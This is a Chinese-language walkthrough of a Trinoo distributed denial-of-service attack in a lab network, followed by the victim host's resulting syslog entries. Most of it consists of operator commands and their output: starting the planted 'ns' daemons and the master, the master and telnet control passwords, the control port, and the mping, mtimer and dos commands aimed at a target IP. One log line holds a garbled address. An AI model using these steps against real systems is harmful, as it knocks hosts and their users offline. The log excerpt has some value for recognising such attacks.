被攻击的目标主机victim IP为:192.168.1.45
ns被植入三台sun的主机里,他们的IP对应关系分别为
client1:192.168.1.11
client2:192.168.1.12
client3:192.168.1.13
master所在主机为masterhost:192.168.1.14
首先我们要启动各个进程,在client1,2,3上分别执行ns,启动攻击守护进程,
其次,在master所在主机启动master
masterhost# ./master
?? gOrave (系统示输入密码,输入gOrave后master成功启动)
Trinoo v1.07d2+f3+c [Mar 20 2000:14:38:49] (连接成功)
在任意一台与网络连通的可使用telnet的设备上,执行:
telnet 192.168.1.14 27665
Escape character is ^].
betaalmostdone (输入密码)
Trinoo v1.07d2+f3+c..[rpm8d/cb4Sx/]
Trinoo> (进入提示符)
Trinoo> mping (我们首先来监测一下各个攻击守护进程是否成功启动)
mping: Sending a PING to every Bcasts.
Trinoo> PONG 1 Received from 192.168.1.11
PONG 2 Received from 192.168.1.12
PONG 3 Received from 192.168.1.13 (成功响应)
Trinoo> mtimer 60 (设定攻击时间为60秒)
mtimer: Setting timer on bcast to 60.
Trinoo> dos 192.168.1.45
DoS: Packeting 192.168.1.45......
至此一次攻击结束,此时ping 192.168.1.45,会得到icmp不可到达反馈,
目标主机此时与网络的正常连接已被破坏。由于Trinoo尚未采用IP地址欺
骗,因此在被攻击的主机系统日志里我们可以看到如下纪录:
Mar 20 14:40:34 victim snmpXdmid: Will attempt to re-establish connection.
Mar 20 14:40:35 victim snmpdx:
error while receiving a pdu from 192.168.1.11.59841:The message has a wrong header type (0x0)
Mar 20 14:40:35 victim snmpdx:
error while receiving a pdu from 192.168.1.12.43661:The message has a wrong header type (0x0)
Mar 20 14:40:36 victim snmpdx:
error while receiving a pdu from 192316831.13.40183:The message has a wrong header type (0x0)
Mar 20 14:40:36 victim snmpXdmid:
Error receiving PDU The message has a wrong header type (0x0).
Mar 20 14:40:36 victim snmpXdmid:
Error receiving packet from agent; rc = -1.
Mar 20 14:40:36 victim snmpXdmid:
Will attempt to re-establish connection.
Mar 20 14:40:36 victim snmpXdmid:
Error receiving PDU The message has a wrong header type (0x0).
Mar 20 14:40:36 victim snmpXdmid:
Error receiving packet from agent; rc = -1.
|